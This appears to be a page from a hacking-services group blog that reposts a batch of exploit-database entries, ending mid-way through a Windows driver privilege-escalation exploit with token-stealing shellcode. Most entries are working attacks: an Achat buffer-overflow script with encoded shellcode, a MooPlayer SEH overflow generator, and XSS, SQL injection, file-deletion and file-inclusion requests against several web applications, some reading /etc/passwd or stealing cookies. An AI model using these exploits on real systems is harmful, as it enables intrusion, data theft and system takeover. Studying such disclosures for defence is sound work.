Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863222337

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/49033/info

Microsoft Visual Studio is prone to multiple cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to spoof content or disclose sensitive information. 

https://www.example.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=%3CarbitraryIDvalue%3E&ControlID=%3CvalidControlID%3E&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert(document.cookie);//&CacheSeed=
HireHackking 
#!/usr/bin/env python
##########################################################################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow POC
# Date Discovered: 09-02-2015
# Exploit Author: Samandeep Singh ( SaMaN - @samanL33T )
# Vulnerable Software: Moo player 1.3.0
# Software Link: https://mooplayer.jaleco.com/
# Vendor site: https://mooplayer.jaleco.com/
# Version: 1.3.0
# Tested On: Windows XP SP3, Win 7 x86.
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this: 
# 01DDF92C ntdll.76FF71CD
# 01DDFF5C 43434343
# 42424242 *** CORRUPT ENTRY ***

# And the Stack

#	01DDFF44   41414141  AAAA
#	01DDFF48   41414141  AAAA
#	01DDFF4C   41414141  AAAA
#	01DDFF50   41414141  AAAA
#	01DDFF54   41414141  AAAA
#	01DDFF58   41414141  AAAA
#	01DDFF5C   42424242  BBBB  Pointer to next SEH record
#	01DDFF60   43434343  CCCC  SE handler
#	01DDFF64   00000000  ....
#	01DDFF68   44444444  DDDD
#	01DDFF6C   44444444  DDDD
#	01DDFF70   44444444  DDDD

# And the Registers

#	EAX 00000000
#	ECX 43434343
#	EDX 76FF71CD ntdll.76FF71CD
#	EBX 00000000
#	ESP 01DDF918
#	EBP 01DDF938
#	ESI 00000000
#	EDI 00000000
#	EIP 43434343
head="http://"
buffer=10000
junk="\x41" * 264
nseh = "\x42" * 4
seh = "\x43" * 4
poc = head + junk + nseh + seh
junk1 = "\x44"*(buffer-len(poc))
poc += junk1
file = "mooplay_poc.m3u"
f=open(file,"w")
f.write(head + poc);
f.close();

#SaMaN(@samanL33T)
HireHackking 
# Exploit Title: Radexscript CMS 2.2.0 - SQL Injection vulnerability
# Google Dork: N/A
# Date: 02/09/2015
# Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://redaxscript.com/
# Software Link: http://redaxscript.com/download/releases
# Version: Redaxscript 2.2.0
# Tested on: Linux
# CVE : CVE-2015-1518


:: PROOF OF CONCEPT ::

POST /redaxscript/ HTTP/1.1
Host: target.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=khtnnm1tvvk3s12if0no367872; GEAR=local-5422433b500446ead50002d4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 96

search_terms=[SQL INJECTION HERE]&search_post=&token=24bcb285bc6f5c93203e4f95d9f2008331faf294&search_post=Search



- Vulnerable parameter: $search_terms
- Vulnerable file:      redaxscript/includes/search.php
- Vulnerable function:  search_post()

- Vulnerable code:
function search_post()
{
	/* clean post */

	if (ATTACK_BLOCKED < 10)
	{
		$search_terms = clean($_POST['search_terms'], 5);
	}

	/* validate post */

	if (strlen($search_terms) < 3 || $search_terms == l('search_terms'))
	{
		$error = l('input_incorrect');
	}

	/* query results */

	else
	{
		$search = array_filter(explode(' ', $search_terms));
		$search_keys = array_keys($search);
		$last = end($search_keys);

		/* query search */

		$query = 'SELECT id, title, alias, description, date, category, access FROM ' . PREFIX . 'articles WHERE (language = \'' . Redaxscript\Registry::get('language') . '\' || language = \'\') && status = 1';
		if ($search)
		{
			$query .= ' && (';
			foreach ($search as $key => $value)
			{

				$query .= 'title LIKE \'%' . $value . '%\' || description LIKE \'%' . $value . '%\' || keywords LIKE \'%' . $value . '%\' || text LIKE \'%' . $value . '%\'';
				if ($last != $key)
				{
					$query .= ' || ';
				}
			}
			$query .= ')';
		}
		$query .= ' ORDER BY date DESC LIMIT 50';
		$result = Redaxscript\Db::forTablePrefix('articles')->rawQuery($query)->findArray();
		$num_rows = count($result);
		if ($result == '' || $num_rows == '')
		{
			$error = l('search_no');
		}

		/* collect output */

		else if ($result)
		{
			$accessValidator = new Redaxscript\Validator\Access();
			$output = '<h2 class="title_content title_search_result">' . l('search') . '</h2>';
			$output .= form_element('fieldset', '', 'set_search_result', '', '', '<span class="title_content_sub title_search_result_sub">' . l('articles') . '</span>') . '<ol class="list_search_result">';
			foreach ($result as $r)
			{
				$access = $r['access'];

				/* if access granted */

				if ($accessValidator->validate($access, MY_GROUPS) === Redaxscript\Validator\Validator::PASSED)
				{
					if ($r)
					{
						foreach ($r as $key => $value)
						{
							$$key = stripslashes($value);
						}
					}

					/* prepare metadata */

					if ($description == '')
					{
						$description = $title;
					}
					$date = date(s('date'), strtotime($date));

					/* build route */

					if ($category == 0)
					{
						$route = $alias;
					}
					else
					{
						$route = build_route('articles', $id);
					}

					/* collect item output */

					$output .= '<li class="item_search_result">' . anchor_element('internal', '', 'link_search_result', $title, $route, $description) . '<span class="date_search_result">' . $date . '</span></li>';
				}
				else
				{
					$counter++;
				}
			}
			$output .= '</ol></fieldset>';

			/* handle access */

			if ($num_rows == $counter)
			{
				$error = l('access_no');
			}
		}
	}

	/* handle error */

	if ($error)
	{
		notification(l('something_wrong'), $error);
	}
	else
	{
		echo $output;
	}
}


:: SOLUTION ::
Update to Redaxscript 2.3.0

::INFORMATION DISCLOSURE::
- 11/27/2014: Inform the vendor
- 11/28/2014: Vendor confirmed
- 01/29/2015: Vendor releases patch
- 01/05/2015: ITAS Team publishes information


:: REFERENCE ::
- http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-redaxscript-2-2-0-cms-75.html

::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn).

:: DISCLAIMER ::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.
HireHackking 
Document Title:
===============
Chemtool 1.6.14 Memory Corruption Vulnerability

Date:
=============
08/02/2015

Vendor Homepage:
================
http://ruby.chemie.uni-freiburg.de/~martin/chemtool/

Abstract Advisory Information:
==============================
Memory Corruption Vulnerability on Chemtool 1.6.14.

Affected Product(s):
====================
Chemtool 1.6.14 or older

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
A Memory Corruption Vulnerability is detected on Chemtool 1.6.14. An
attacker can crash the software by using an input file.
Also, an attacker can crash the software by entering a filename too long.

b77a8000-b77a9000 r--s 00000000 08:01 152558
/var/cache/fontconfig/3fe29f0c9fa221c8ee16555d4835b3ab-le32d4.cache-4
b77a9000-b77aa000 r--s 00000000 00:15 209651 /run/user/1000/dconf/user
b77aa000-b77bb000 r-xp 00000000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bb000-b77bc000 r--p 00010000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bc000-b77bd000 rw-p 00011000 08:01 393480
/usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so
b77bd000-b77be000 rwxp 00000000 00:00 0
b77be000-b77bf000 r--p 00855000 08:01 274691
/usr/lib/locale/locale-archive
b77bf000-b77c0000 r--p 00596000 08:01 274691
/usr/lib/locale/locale-archive
b77c0000-b77c2000 rw-p 00000000 00:00 0
b77c2000-b77c3000 r-xp 00000000 00:00 0 [vdso]
b77c3000-b77e3000 r-xp 00000000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
b77e3000-b77e4000 r--p 0001f000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
b77e4000-b77e5000 rw-p 00020000 08:01 132074 /lib/i386-linux-gnu/
ld-2.19.so
bfeff000-bff21000 rw-p 00000000 00:00 0 [stack]
Aborted (core dumped)

Proof of Concept (PoC):
=======================
This vulnerabilities can be exploited by local attackers with
userinteraction.

First test. Attacker can generate a malicious file (format .png).This file
can produced a Stack Smashing.

#/usr/bin/ruby

buf = "a"*3000

filename = "crash.png"
file = open(filename,'w')
file.write(buf)
file.close
puts "file created!"

Second test. Attacker can enter a filename too long. For example, this
program needs recieve a parameter. If this parameter is too long, It will
crash.

$chemtool $(perl -e 'print "A"x900')

How to perform:
=======================
1) You can test it with gdb. You attach this application.
2) Run it, now, you can move "crash.png" file that we generated by our ruby
script to the application. Also, you can run argv[1] with a long value.

When you perform above steps so application will crash. Analyze it on gdb.

Solution - Fix & Patch:
=======================
Restrict working maximum size. I believe that this bug doesn't have
solution.

Security Risk:
==============
The security risk of the vulnerability is estimated as medium because of
the local crash method.

Authors:
==================
Pablo González
HireHackking 
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit

import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes

buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"


# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.91.130', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40" 
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()
HireHackking 

u5CMS 3.9.3 (deletefile.php) Arbitrary File Deletion Vulnerability


Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.

Desc: Input passed to the 'f' parameter in 'deletefile.php' is not properly
sanitised before being used to delete files. This can be exploited to delete
files with the permissions of the web server using their absolute path or via
directory traversal sequences passed within the affected GET parameter.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5226
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5226.php


29.12.2014

---


Target: C:\deleteme.txt
-----------------------

GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=/deleteme.txt HTTP/1.1
GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=../../../../../../deleteme.txt HTTP/1.1
HireHackking 

u5CMS 3.9.3 Multiple SQL Injection Vulnerabilities


Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.

Desc: Input passed via multiple parameters in multiple scripts is not properly
sanitised before being used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5225
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5225.php


29.12.2014

---


1. POST /u5cms/u5admin/copy2.php?name=album HTTP/1.1

   name=album[INJECT]


2. GET /u5cms/u5admin/editor.php?c=start[INJECT] HTTP/1.1


3. GET /u5cms/u5admin/localize.php?name=album[INJECT] HTTP/1.1


4. POST /u5cms/u5admin/meta2.php?typ=a[INJECT]&uri=metai.php HTTP/1.1


5. GET /u5cms/u5admin/metai.php?typ=a&name=album[INJECT] HTTP/1.1


6. GET /u5cms/u5admin/nc.php?name=o[INJECT] HTTP/1.1


7. POST /u5cms/u5admin/new2.php?typ=e HTTP/1.1

   name=test[INJECT]&typ=e


8. POST /u5cms/u5admin/rename2.php?name=album HTTP/1.1

   name=album2[INJECT]&ulinks=yes


9. GET /u5cms/u5admin/rename2.php?name=valbum&newname=valbum2[INJECT]&typ=a HTTP/1.1
HireHackking 

u5CMS 3.9.3 Multiple Stored And Reflected XSS Vulnerabilities


Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.

Desc: u5CMS suffers from multiple stored and reflected cross-site scripting
vulnerabilities. Input passed to several POST and GET parameters is not properly
sanitised before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an
affected site.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5223
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5223.php


29.12.2014

---


Reflected XSS:
==============

GET /u5cms/index.php?c=start"><script>alert(1)</script>&l=e&p=1&r= HTTP/1.1
GET /u5cms/index.php?i=1"><script>alert(2)</script>&p=1&c=start&l=d HTTP/1.1
GET /u5cms/index.php?c=start&l=e"><script>alert(3)</script>&p=1&r= HTTP/1.1
GET /u5cms/index.php?c=start&l=e&p=1"><script>alert(4)</script>&r= HTTP/1.1
GET /u5cms/u5admin/cookie.php?a=i2_l%00%3balert(5)//&b=d HTTP/1.1
GET /u5cms/u5admin/cookie.php?a=i2_l&b=%3balert(6)// HTTP/1.1
GET /u5cms/u5admin/copy.php?name=album"><img%20src%3da%20onerror%3dalert(7)> HTTP/1.1
GET /u5cms/u5admin/delete.php?name=a"><img%20src%3da%20onerror%3dalert(8)> HTTP/1.1
GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=../r/shortreference/shortreference_en.php.txt'%3balert(9)// HTTP/1.1
GET /u5cms/u5admin/deletefile.php?typ=d'%3balert(10)//&name=shortreference&f=../r/shortreference/shortreference_en.php.txt HTTP/1.1
GET /u5cms/u5admin/done.php?n=inserted%20test"><script>alert(11)</script> HTTP/1.1
GET /u5cms/u5admin/editor.php?c=c"><script>alert(12)</script> HTTP/1.1
POST /u5cms/u5admin/meta2.php?typ=a&uri=metai.php'%3balert(13)// HTTP/1.1
GET /u5cms/u5admin/notdone.php?n=wrong%20name,%20not%20deleted%20<script>alert(14)</script> HTTP/1.1
GET /u5cms/u5admin/rename2.php?name=valbum&newname=valbum'%3balert(15)//&typ=a HTTP/1.1
GET /u5cms/u5admin/sendfile.php?name=shortreference&l=_frd"><script>alert(16)</script>&typ=d HTTP/1.1
GET /u5cms/u5admin/characters.php?more=335&s=335"><script>alert(17)</script> HTTP/1.1


Stored XSS:
===========

<html>
  <body>
    <form action="http://10.0.50.3/u5cms/u5admin/savepage.php" method="POST">
      <input type="hidden" name="page" value='ZSL"><script>alert(document.cookie);</script>' />
      <input type="hidden" name="view" value="d" />
      <input type="hidden" name="ishomepage" value="1" />
      <input type="hidden" name="hidden" value="0" />
      <input type="hidden" name="logins" value="" />
      <input type="hidden" name="title_d" value="Test" />
      <input type="hidden" name="desc_d" value="" />
      <input type="hidden" name="key_d" value="" />
      <input type="hidden" name="content_d" value="Tstz" />
      <input type="hidden" name="title_e" value="ZSL" />
      <input type="hidden" name="desc_e" value="llll" />
      <input type="hidden" name="key_e" value="qqq" />
      <input type="hidden" name="content_e" value="AllTheWay" />
      <input type="hidden" name="title_f" value="None" />
      <input type="hidden" name="desc_f" value="" />
      <input type="hidden" name="key_f" value="" />
      <input type="hidden" name="content_f" value="Aloha" />
      <input type="hidden" name="coco" value="1423010603" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


--


<html>
  <body>
    <form action="http://10.0.50.3/u5cms/u5admin/new2.php?typ=e" method="POST">
      <input type="hidden" name="name" value='"><img%20src%3da%20onerror%3dalert("XSS")>' />
      <input type="hidden" name="typ" value="e" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
HireHackking 

u5CMS 3.9.3 (thumb.php) Local File Inclusion Vulnerability


Vendor: Stefan P. Minder
Product web page: http://www.yuba.ch
Affected version: 3.9.3 and 3.9.2

Summary: u5CMS is a little, handy Content Management System for medium-sized
websites, conference / congress / submission administration, review processes,
personalized serial mails, PayPal payments and online surveys based on PHP and
MySQL and Apache.

Desc: u5CMS suffers from an authenticated file inclusion vulnerability (LFI) when
input passed thru the 'f' parameter to thumb.php script is not properly verified
before being used to include files. This can be exploited to include files from
local resources with their absolute path and with directory traversal attacks.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5224
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5224.php


29.12.2014

---


GET /u5cms/thumb.php?w=100&f=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
GET /u5cms/thumb.php?w=100&f=/windows/win.ini HTTP/1.1
HireHackking 
# Exploit Title: StaMPi -  Local File Inclusion
# Google Dork: "Designed by StaMPi" inurl:fotogalerie.php
# Date: 16/2/15
# Author : e . V . E . L
# Contact: waleed200955@hotmail.com



PoC:

http://site.com/path/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00
HireHackking 
source: https://www.securityfocus.com/bid/49051/info

Softbiz Recipes Portal script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/[path]/admin/index.php?msg=[XSS]
http://www.example.com/[path]/signinform.php?id=0&return_add=/caregivers/index.php&errmsg=[XSS]
http://www.example.com/[path]/signinform.php?errmsg=[XSS]
http://www.example.com/[path]/msg_confirm_mem.php?errmsg=[XSS]
HireHackking 
source: https://www.securityfocus.com/bid/49090/info

OpenEMR is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

OpenEMR 4.0.0 is vulnerable; other versions may also be affected. 

http://www.example.com/openemr/interface/main/calendar/index.php?tplview='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/calendar/index.php?pc_category='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/calendar/index.php?pc_topic='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?sortby="<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?sortorder="<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?showall=no&sortby=users%2elname&sortorder=asc&begin=724286<">
HireHackking 
######################

# Exploit Title : Wordpress Video Gallery 2.7 SQL Injection Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.7.zip

# Dork Google: inurl:/wp-admin/admin-ajax.php?action=rss
            

# Date : 2015-02-11

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox         

######################

# Vulnerability Disclosure Timeline:

2015-02-08:  Discovered vulnerability
2015-02-09:  Vendor Notification
2015-02-10:  Vendor Response/Feedback 
2015-02-10:  Vendor Send Fix/Patch 
2015-02-11:  Public Disclosure 

# Description

Wordpress Video Gallery 2.7 suffers from SQL injection


######################

# PoC

http://target/wp-admin/admin-ajax.php?action=rss&type=video&vid=[SQLi]


#####################

# Fix/patch sent by apptha's developer

File: videogalleryrss.php

Change line n.47 

from:

		$vid             = filter_input(INPUT_GET,'vid');
to:

		$vid             = intval(filter_input(INPUT_GET,'vid'));

#####################

Discovered By : Claudio Viviani
        	http://www.homelab.it
        	info@homelab.it
        	homelabit@protonmail.ch

        	https://www.facebook.com/homelabit
        	https://twitter.com/homelabit
        	https://plus.google.com/+HomelabIt1/
		https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
HireHackking 
/*

Exploit Title    - SoftSphere DefenseWall FW/IPS Arbitrary Write Privilege Escalation
Date             - 10th February 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - http://www.softsphere.com
Tested Version   - 3.24
Driver Version   - 3.2.3.0 - dwall.sys
Tested on OS     - 32bit Windows XP SP3 
OSVDB            - http://www.osvdb.org/show/osvdb/117996
CVE ID           - CVE-2015-1515
Vendor fix url   - 
Fixed Version    - no fix
Fixed driver ver - 

*/


#include <stdio.h>
#include <windows.h>

#define BUFSIZE 4096


typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
     HANDLE  Section;
     PVOID   MappedBase;
     PVOID   Base;
     ULONG   Size;
     ULONG   Flags;
     USHORT  Index;
     USHORT  NameLength;
     USHORT  LoadCount;
     USHORT  PathLength;
     CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
 
typedef struct _SYSTEM_MODULE_INFORMATION {
     ULONG   Count;
     SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS { 
     SystemModuleInformation = 11,
     SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
     SYSTEM_INFORMATION_CLASS SystemInformationClass,
     PVOID SystemInformation,
     ULONG SystemInformationLength,
     PULONG ReturnLength);

typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
     DWORD ProfileSource, 
     PULONG Interval);

typedef void (*FUNCTPTR)(); 



// Windows XP SP3

#define XP_KPROCESS 0x44      // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN    0xc8      // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID     0x84      // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS  0x88      // Offset to ActiveProcessLinks _EPROCESS struct


BYTE token_steal_xp[] =
{
  0x52,                                                  // push edx                       Save edx on the stack
  0x53,	                                                 // push ebx                       Save ebx on the stack
  0x33,0xc0,                                             // xor eax, eax                   eax = 0
  0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                    // mov eax, fs:[eax+124h]         Retrieve ETHREAD
  0x8b,0x40,XP_KPROCESS,                                 // mov eax, [eax+XP_KPROCESS]     Retrieve _KPROCESS
  0x8b,0xc8,                                             // mov ecx, eax
  0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+XP_TOKEN]        Retrieves TOKEN
